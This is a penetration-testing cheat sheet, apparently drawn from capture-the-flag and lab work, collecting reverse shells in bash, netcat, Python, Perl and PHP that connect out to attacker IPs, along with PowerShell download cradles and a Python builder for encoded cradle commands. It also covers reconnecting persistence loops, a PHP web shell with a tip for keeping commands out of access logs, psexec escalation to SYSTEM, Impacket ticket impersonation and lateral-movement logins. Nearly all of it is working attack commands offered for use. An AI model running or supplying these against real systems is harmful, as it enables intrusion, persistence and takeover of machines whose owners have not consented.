Reverse Shell
Linux
#Bash
bash -c 'bash -i >& /dev/tcp/<ip>/443 0>&1'
#netcat (needs a build with -e; the listener side is nc -lvnp <port>)
nc <ip> <port> -e /bin/bash
nc <ip> <port> -e cmd.exe
#netcat without -e (named pipe carries the shell's input)
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <ip> 443 > /tmp/f
#php
#(with proc_open & proc_close - shell.phar)
<?php
$descriptorspec = array(
    0 => array("pipe", "r"),                          // stdin: the command is written here
    1 => array("pipe", "w"),                          // stdout: read back with stream_get_contents
    2 => array("file", "/tmp/error-output.txt", "a")  // stderr appended to a file
);
$cwd = "/tmp";
$env = array("some_option" => "aeiou");
$process = proc_open("sh", $descriptorspec, $pipes, $cwd, $env);
if (is_resource($process)) {
    // command fed to sh's stdin; replace 127.0.0.1 9001 with your listener
    fwrite($pipes[0], "nc 127.0.0.1 9001");
    fclose($pipes[0]);
    echo stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    $return_value = proc_close($process);
    echo "command returned $return_value\n";
}
?>
#python injection input
__import__('os').system('whoami')
#python.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.27",2323));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
#perl
perl -e 'use Socket;$i="10.10.14.27";$p=2323;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'
Windows
#Execute file.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File shell.ps1
#Execute file remotely (download cradle: the script is fetched and run in memory)
IEX (New-Object System.Net.WebClient).DownloadString('http://<attacker ip>/shell.ps1')
# Invoke-PowershellTcpOneLine.ps1
# Invoke-PowerShellTcp.ps1
# 1. setup python http server
# 2. execute
powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://<ip attacker>/Invoke-PowerShellTcp.ps1')
#or
powershell iwr http://<ip attacker>/shell.ps1 -o C:/Windows/Tasks/shell.ps1
# encode payload
cat Invoke-PowerShellTcpOneLine.ps1 | iconv -t utf-16le | base64 -w 0
powershell -enc <encode payload>
# Execute command without crashing the previous shell
# 1. pwn.ps1
Invoke-WebRequest -Uri http://<attacker ip> -OutFile C:\Windows\Tasks\shell.exe;
Start-Process -NoNewWindow -FilePath C:\Windows\Tasks\shell.exe
# 2. execute this command
powershell -ep bypass -c "iex(iwr -uri http://<attacker ip>/pwn.ps1 -usebasicparsing)"
# note: you could change the payload in the pwn.ps1 if your payload doesn't work.
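The "encode payload" step above (UTF-16LE, then base64) and the download cradle are easy to get subtly wrong by hand (wrong encoding, a stray newline, mismatched quotes). The following is an added example, not code from the original page, that builds both in Python and lets you decode a blob to check it before sending it; the attacker IP, port and script name are placeholder assumptions.

```python
#!/usr/bin/env python3
"""Build `powershell -enc <...>` payloads (UTF-16LE + base64) and the
IEX/DownloadString cradle. Added example; host/script names are assumed."""
import base64


def encode_powershell(command: str) -> str:
    """Return the -EncodedCommand form of `command`.

    PowerShell expects the base64 to wrap UTF-16LE text; plain UTF-8
    base64 (the common mistake) decodes to garbage on the target.
    """
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_powershell(blob: str) -> str:
    """Reverse of encode_powershell; use it to sanity-check a payload."""
    return base64.b64decode(blob).decode("utf-16-le")


def download_cradle(attacker_ip: str, script: str, port: int = 80) -> str:
    """The IEX/DownloadString cradle from the Windows section, with the
    URL assembled rather than hand-typed (a missing http:// breaks it)."""
    url = f"http://{attacker_ip}:{port}/{script}"
    return f"IEX (New-Object Net.WebClient).DownloadString('{url}')"


def encoded_cradle_command(attacker_ip: str, script: str, port: int = 80) -> str:
    """Full command line to run on the target: cradle wrapped in -enc."""
    cradle = download_cradle(attacker_ip, script, port)
    return f"powershell -NoProfile -ExecutionPolicy Bypass -enc {encode_powershell(cradle)}"


def payload_from_file(path: str) -> str:
    """Encode a whole .ps1 (e.g. Invoke-PowerShellTcpOneLine.ps1); same
    result as `cat file | iconv -t utf-16le | base64 -w 0`."""
    with open(path, encoding="utf-8") as fh:
        return encode_powershell(fh.read())


if __name__ == "__main__":
    # Placeholder attacker IP and script name (assumed, as on the page).
    print(encoded_cradle_command("10.10.14.27", "Invoke-PowerShellTcp.ps1"))
```

Prefer encoding a short cradle over a whole script: cmd.exe caps a command line at 8191 characters, so a large .ps1 pushed through -enc will be truncated, while the cradle stays small and fetches the real script from your HTTP server.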
Shell Stabilization (Linux)
When: right after catching the raw shell, before doing anything else.
Note:
[Ctrl + C] only works in the upgraded shell (it needs a TTY and bash as the shell); in a raw nc shell it kills your listener instead.
Use "clear" instead to tidy the terminal.
python -c 'import pty; pty.spawn("/bin/bash")'   # python3 -c '...' if only python3 is installed
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='clear; ls -lsaht --color=auto'
Keyboard shortcut: [Ctrl + Z] (backgrounds the shell; you are now back on the attacker box)
stty raw -echo; fg; reset
stty columns 200 rows 200   # or match the output of `stty size` from another terminal
Persistence Reverse Shell
Important: start the persistence loop before doing anything else, so a dropped or crashed shell reconnects on its own.
Linux
while :; do setsid bash -i >& /dev/tcp/<ATTACKER IP>/<LPORT> 0>&1; sleep 60; done >/dev/null 2>&1 &
nohup bash -c "while :; do bash -i >& /dev/tcp/<ATTACKER IP>/<LPORT> 0>&1; sleep 60; done" &
Windows
need to upload nc.exe first
start cmd /C "for /L %n in (1,0,10) do ( nc.exe <ATTACKER IP> <PORT> -e cmd.exe & ping -n 60 127.0.0.1 )"
(step 0 in the for /L range makes the loop run forever; ping -n 60 to localhost is the 60-second sleep. Inside a .bat file write %%n instead of %n.)
Web Shell
PHP
cmd --> shell.php
<?php
echo system($_REQUEST['cmd']);
?>
$URL/shell.php?cmd=id
note: the simple way is to use Burp Suite Repeater to send commands.
Change the GET request to a POST request for a better input experience: no URL-encoding of spaces and special characters, and the command no longer lands in the web server's access log request line ($_REQUEST accepts either).
IIS
Dig deeper
https://github.com/tennc/webshell
Windows NT Authority shell from Administrator
psexec.exe -i -s cmd.exe
psexec.exe -i -s %SystemRoot%\system32\cmd.exe
Shell to another user in Active Directory
note: powershell
Convert credentials
$pw = ConvertTo-SecureString "<password>" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential "<username>", $pw   # use "<domain>\<username>" for a domain account
Command
Invoke-Command -ComputerName 127.0.0.1 -Credential $creds -ScriptBlock { whoami }
after login, run powerview.
Shell with silver ticket
Despite the heading, this is constrained delegation (S4U2Self/S4U2Proxy), not a forged silver ticket: if the account you control is trusted for constrained delegation to the target service,
you can use getST's -impersonate flag to request a service ticket on behalf of another user (Administrator here).
for example:
Copy # example env
Target IP: 10.10.10.1
Domain: test.local
Service: www
Host Name: server01.test.local
Username: john
Password: password123
Impersonated User: Administrator
Request ticket
# username and password
python getST.py -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john:password123
impacket-getST -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john:password123
# NTLM hash (Impacket's -hashes format is LMHASH:NTHASH; the LM part may be left empty, as in -hashes :<NT hash>)
python3 getST.py -spn www/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$ -hashes <LM hash>:<NT hash>
Save ticket to env
export KRB5CCNAME=Administrator.ccache   # getST prints the .ccache filename it wrote; use that name
Login with ticket
impacket-psexec -k -no-pass <domain>/Administrator@<target FQDN>
impacket-psexec -k -no-pass intelligence.htb/Administrator@dc.intelligence.htb
(use the hostname from the SPN, not an IP, so the ticket matches; a ticket requested for www/<host> is accepted by SMB on the same host because the service class in the SPN is not validated, only the host account's key matters.)
Login using Impacket (need local admin creds)
These need credentials that are local admin on the target; if one command fails, try the next one.
# test first with crackmapexec smb $IP -u <username> -p <password> (look for Pwn3d!)
impacket-psexec <domain>/<username>@$IP
impacket-smbexec <domain>/<username>@$IP
# wmi (DCOM on tcp/135 plus a dynamic high port)
impacket-wmiexec <domain>/<username>@$IP
# test first with crackmapexec winrm $IP -u <username> -p <password>
evil-winrm -i $IP -u <username> -p <password>